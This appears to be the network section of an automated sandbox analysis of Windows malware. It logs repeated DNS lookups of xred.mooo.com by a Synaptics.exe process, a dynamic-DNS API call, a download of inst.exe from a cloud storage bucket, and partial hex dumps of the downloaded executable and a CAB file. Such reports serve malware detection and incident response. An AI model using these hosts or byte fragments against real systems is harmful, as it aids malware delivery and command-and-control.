                                                                                                                                                                    Dec 30, 2024 04:59:14.357651949 CET1.1.1.1192.168.2.40x1eb4Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:17.958836079 CET1.1.1.1192.168.2.40xc5dcNo error (0)agd.p.360.cnagd2.p.360.cnCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:17.958836079 CET1.1.1.1192.168.2.40xc5dcNo error (0)agd2.p.360.cn1.192.194.215A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:17.958836079 CET1.1.1.1192.168.2.40xc5dcNo error (0)agd2.p.360.cn1.192.194.232A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:18.351447105 CET1.1.1.1192.168.2.40xb804No error (0)pinst.360.cnsoftm.update.360safe.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:18.351447105 CET1.1.1.1192.168.2.40xb804No error (0)softm.update.360safe.comseupdate.360qhcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:18.351447105 CET1.1.1.1192.168.2.40xb804No error (0)seupdate.360qhcdn.com39.156.85.231A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:18.351447105 CET1.1.1.1192.168.2.40xb804No error (0)seupdate.360qhcdn.com39.156.85.200A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:18.351447105 CET1.1.1.1192.168.2.40xb804No error (0)seupdate.360qhcdn.com39.156.85.201A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:18.883945942 CET1.1.1.1192.168.2.40xeef2Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:24.571327925 CET1.1.1.1192.168.2.40x4113Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:31.367862940 CET1.1.1.1192.168.2.40x4b05Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:35.899194956 CET1.1.1.1192.168.2.40xef30Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:41.570924044 CET1.1.1.1192.168.2.40x69b7Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:48.368267059 CET1.1.1.1192.168.2.40x99f3Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:52.950088978 CET1.1.1.1192.168.2.40x11e0Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:57.045190096 CET1.1.1.1192.168.2.40xf509No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 04:59:57.045190096 CET1.1.1.1192.168.2.40xf509No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 30, 2024 05:00:06.404266119 CET1.1.1.1192.168.2.40x5764Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                    • bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                                                                                                                                                                    • docs.google.com
                                                                                                                                                                    • drive.usercontent.google.com
                                                                                                                                                                    • freedns.afraid.org
                                                                                                                                                                    • s.360.cn
                                                                                                                                                                    • pinst.360.cn

                                                                                                                                                                    HTTP Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.44974369.42.215.252805780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 30, 2024 04:59:08.055944920 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                                    User-Agent: MyApp
                                                                                                                                                                    Host: freedns.afraid.org
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Dec 30, 2024 04:59:08.668195009 CET243INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:08 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                    X-Cache: MISS
                                                                                                                                                                    Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.449774180.163.251.230807448C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 30, 2024 04:59:12.712706089 CET398OUTGET /safe/instcomp.htm?soft=1000&status=100&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 30, 2024 04:59:13.583138943 CET240INHTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:13 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:48 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5b4-0"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Dec 30, 2024 04:59:14.377734900 CET428OUTGET /safe/instcomp.htm?soft=1000&status=127&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 30, 2024 04:59:14.685301065 CET240INHTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:14 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:48 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5b4-0"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Dec 30, 2024 04:59:15.686605930 CET384OUTGET /safe/instcomp.htm?soft=1000&status=1&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 30, 2024 04:59:15.994678974 CET240INHTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:15 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:48 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5b4-0"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Dec 30, 2024 04:59:15.998871088 CET385OUTGET /safe/instcomp.htm?soft=1000&status=12&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 30, 2024 04:59:16.307586908 CET240INHTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:16 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:48 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5b4-0"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Dec 30, 2024 04:59:17.653928995 CET384OUTGET /safe/instcomp.htm?soft=1000&status=8&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 30, 2024 04:59:17.961636066 CET240INHTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:17 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:48 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5b4-0"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Dec 30, 2024 04:59:19.988972902 CET385OUTGET /safe/instcomp.htm?soft=1000&status=10&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 30, 2024 04:59:20.296650887 CET240INHTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:20 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:48 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5b4-0"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Dec 30, 2024 04:59:20.441509008 CET239OUTGET /safe/instcomp.htm?soft=425&status=19&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=2282&downrate=0&downlen=0 HTTP/1.1
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Dec 30, 2024 04:59:20.750931978 CET240INHTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:20 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:48 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5b4-0"
                                                                                                                                                                    Accept-Ranges: bytes


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.449793180.163.251.230807448C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 30, 2024 04:59:15.693264961 CET398OUTGET /safe/instcomp.htm?soft=1000&status=109&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 30, 2024 04:59:16.551422119 CET240INHTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:16 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:43 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5af-0"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Dec 30, 2024 04:59:17.104778051 CET235OUTGET /safe/instcomp.htm?soft=425&status=1&mid=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Dec 30, 2024 04:59:17.408907890 CET240INHTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:17 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:43 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5af-0"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Dec 30, 2024 04:59:17.648430109 CET398OUTGET /safe/instcomp.htm?soft=1000&status=107&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 30, 2024 04:59:17.952276945 CET240INHTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:17 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:43 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5af-0"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Dec 30, 2024 04:59:20.185545921 CET398OUTGET /safe/instcomp.htm?soft=1000&status=129&m=6039146e22b008fbd61fc0617475e9aa&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                    Host: s.360.cn
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Dec 30, 2024 04:59:20.489299059 CET240INHTTP/1.1 200 OK
                                                                                                                                                                    Server: openresty/1.15.8.2
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:20 GMT
                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    Last-Modified: Fri, 27 Jul 2018 07:11:43 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "5b5ac5af-0"
                                                                                                                                                                    Accept-Ranges: bytes


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.44980539.156.85.231807448C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 30, 2024 04:59:18.387465000 CET202OUTGET /360safe/h_inst.cab?rd=34183220 HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
                                                                                                                                                                    Host: pinst.360.cn
                                                                                                                                                                    Connection: Close
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Dec 30, 2024 04:59:19.292742968 CET867INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:19 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 648
                                                                                                                                                                    Last-Modified: Fri, 27 Dec 2024 02:49:36 GMT
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Data Raw: 4d 53 43 46 00 00 00 00 88 02 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 46 00 00 00 01 00 01 00 56 03 00 00 00 00 00 00 00 00 9b 59 76 54 20 00 73 65 74 75 70 2e 69 6e 69 00 9c 0c 0f 43 3a 02 56 03 43 4b 65 51 cb 8a 13 41 14 dd 37 f4 3f f8 01 92 dc ba f5 16 6a 51 4f 08 a8 0c 33 8c 9b 41 42 27 69 33 c1 4e 3a 74 f7 30 2e f2 47 6e 44 c1 95 a0 4b 15 11 bf c5 bd 60 f5 30 19 67 b0 0b 8a 7b aa cf bd 55 e7 9c 0b 2a 60 b6 eb 87 aa 69 ea ee 65 59 9c 35 9b 55 7d 76 d9 5e 9f d6 7d 7b d5 2d eb f3 d3 a7 e6 72 18 f6 4f a6 d3 55 7b bd 9b 64 7e 5f bd aa 27 cb 76 3b bd ad a7 fd d8 d4 e7 a6 f9 ae be 9e 2c ab 45 59 a4 ae dd 9a cb f9 26 8f 2e 8b 93 ae 5d 5d 2d 07 93 f9 67 99 5f 16 65 71 71 5b e7 2b 9f 57 db 7a fc f5 ee fd d7 b7 3f bf 7c ff 9c f9 9b d5 5d 6f 9a 05 d3 d7 c3 d5 7e 4e e8 04 f2 42 00 f5 ba 2c 5e d4 5d bf 69 77 e6 df a9 2e 8b d3 7a 7d 7b 9e 36 cd cd d0 0c 27 ab a6 29 8b 59 ef ea a1 32 50 16 e7 5d d3 9b fd 28 26 6b 5a a0 21 00 80 32 6f 87 3d 1a 07 96 20 07 e9 79 92 c9 21 06 [TRUNCATED]
                                                                                                                                                                    Data Ascii: MSCF,FVYvT setup.iniC:VCKeQA7?jQO3AB'i3N:t0.GnDK`0g{U*`ieY5U}v^}{-rOU{d~_'v;,EY&.]]-g_eqq[+Wz?|]o~NB,^]iw.z}{6')Y2P](&kZ!2o= y!ItPHTLK]<E|?>BgoMud1B#P'3NG]y4gj}c9wGAz*8F/s:4U\Z1{O"Io(0P:BJ<::x$*#NF<F`ErL 9KS r5-b"h~[1dIaiasAzWY-Hq<`0@J


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.44980639.156.85.200807448C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 30, 2024 04:59:19.331927061 CET202OUTGET /360safe/h_inst.cab?rd=34183220 HTTP/1.1
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
                                                                                                                                                                    Host: pinst.360.cn
                                                                                                                                                                    Connection: Close
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Dec 30, 2024 04:59:19.660701036 CET228INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.2.6.10
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:19 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 648
                                                                                                                                                                    Last-Modified: Fri, 27 Dec 2024 02:49:32 GMT
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Dec 30, 2024 04:59:19.660826921 CET648INData Raw: 4d 53 43 46 00 00 00 00 88 02 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 46 00 00 00 01 00 01 00 56 03 00 00 00 00 00 00 00 00 9b 59 76 54 20 00 73 65 74 75 70 2e 69 6e 69 00 9c 0c 0f 43 3a 02 56 03 43 4b 65 51
                                                                                                                                                                    Data Ascii: MSCF,FVYvT setup.iniC:VCKeQA7?jQO3AB'i3N:t0.GnDK`0g{U*`ieY5U}v^}{-rOU{d~_'v;,EY&.]]-g_eqq[+W


                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.44973247.79.48.2114433624C:\Users\user\Desktop\._cache_zhuzhu.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:03 UTC132OUTGET /inst.exe HTTP/1.1
                                                                                                                                                                    User-Agent: URLDownloader
                                                                                                                                                                    Host: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:03 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                    Server: AliyunOSS
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:03 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 4118496
                                                                                                                                                                    Connection: close
                                                                                                                                                                    x-oss-request-id: 67721A877CC7753934B1EB98
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    ETag: "AAA0F14BDFE3777EEE342C27DE409E6D"
                                                                                                                                                                    Last-Modified: Sat, 28 Dec 2024 06:31:15 GMT
                                                                                                                                                                    x-oss-object-type: Normal
                                                                                                                                                                    x-oss-hash-crc64ecma: 13828654626470641508
                                                                                                                                                                    x-oss-storage-class: Standard
                                                                                                                                                                    x-oss-ec: 0048-00000113
                                                                                                                                                                    Content-Disposition: attachment
                                                                                                                                                                    x-oss-force-download: true
                                                                                                                                                                    Content-MD5: qqDxS9/jd37uNCwn3kCebQ==
                                                                                                                                                                    x-oss-server-time: 34
                                                                                                                                                                    2024-12-30 03:59:03 UTC15821INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 21 c5 b9 d1 65 a4 d7 82 65 a4 d7 82 65 a4 d7 82 d8 eb 41 82 61 a4 d7 82 6c dc 42 82 79 a4 d7 82 42 62 b9 82 64 a4 d7 82 6c dc 5e 82 73 a4 d7 82 7b f6 53 82 61 a4 d7 82 42 62 ba 82 66 a4 d7 82 42 62 ac 82 40 a4 d7 82 65 a4 d6 82 b7 a5 d7 82 6c dc 54 82 d2 a4 d7 82 6c dc 53 82 ca a4 d7 82 7b f6 43 82 64 a4 d7 82 6c dc 46 82 64 a4 d7 82 52 69 63 68 65 a4 d7 82 00 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!eeeAalByBbdl^s{SaBbfBb@elTlS{CdlFdRiche
                                                                                                                                                                    2024-12-30 03:59:04 UTC16384INData Raw: c8 75 08 c7 44 24 10 fe ff 00 00 0f b7 74 24 10 8d 34 b6 03 f6 03 f6 03 f6 8b c6 e8 23 f3 ff ff 89 44 24 18 85 c0 75 19 68 68 cc 4c 00 50 50 ba 68 cc 4c 00 e8 4a 37 00 00 83 c4 0c e9 62 01 00 00 85 f6 74 24 8b 4c 24 34 8b 54 24 30 56 50 51 52 8d 7c 24 48 e8 e9 f9 ff ff 83 c4 10 85 c0 0f 84 3e 01 00 00 8b 44 24 18 01 b5 b0 00 00 00 83 7c 24 14 00 8b 74 24 10 74 2b 33 ff 33 d2 8b c8 66 3b fe 73 20 81 39 49 4e 49 54 75 06 80 79 04 00 74 0b 42 83 c1 28 66 3b d6 72 e9 eb 07 c6 85 9e 00 00 00 01 8b 4c 24 24 8b 54 24 20 51 e8 d0 01 00 00 8b f0 83 c4 04 89 74 24 20 85 f6 0f 84 c3 00 00 00 6a 0a 56 8d 44 24 40 e8 03 01 00 00 83 c4 08 85 c0 0f 84 ac 00 00 00 8b 40 04 85 c0 0f 89 a1 00 00 00 25 ff ff ff 7f 03 c6 68 60 03 00 00 50 8d 44 24 40 e8 d7 00 00 00 83 c4 08
                                                                                                                                                                    Data Ascii: uD$t$4#D$uhhLPPhLJ7bt$L$4T$0VPQR|$H>D$|$t$t+33f;s 9INITuytB(f;rL$$T$ Qt$ jVD$@@%h`PD$@
                                                                                                                                                                    2024-12-30 03:59:04 UTC16384INData Raw: 20 73 4b 85 db 74 47 b9 20 00 00 00 2b cf 89 4c 24 0c 8b 4c 24 14 2b ce 55 8d 14 9e 89 4c 24 0c eb 05 90 8b 4c 24 0c 8b 74 11 fc 83 ea 04 8b ee 8b cf d3 ed 4b 0b e8 89 2a 85 ff 74 0a 8b 4c 24 10 d3 e6 8b c6 eb 02 33 c0 85 db 75 d6 5d 5e 5b 83 c4 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 81 ec 38 06 00 00 55 8b ac 24 4c 06 00 00 57 8b f8 8b 84 24 54 06 00 00 85 c0 0f 84 d4 02 00 00 48 83 3c 87 00 75 07 8b c8 48 85 c9 75 f3 53 8d 58 01 89 5c 24 14 85 db 0f 84 b5 02 00 00 8b 4c 9f fc 33 c0 85 c9 74 08 40 d1 e9 83 f8 20 72 f4 56 be 20 00 00 00 2b f0 89 74 24 2c 8b cb 8d 84 24 3c 02 00 00 eb 09 8d a4 24 00 00 00 00 8b ff c7 00 00 00 00 00 83 c0 04 83 e9 01 75 f2 8b 84 24 54 06 00 00 55 8d 8c 24 40 02 00 00 e8 ae fe ff ff 89 84 ac 40 02 00 00 53 8b c7
                                                                                                                                                                    Data Ascii: sKtG +L$L$+UL$L$tK*tL$3u]^[8U$LW$TH<uHuSX\$L3t@ rV +t$,$<$u$TU$@@S
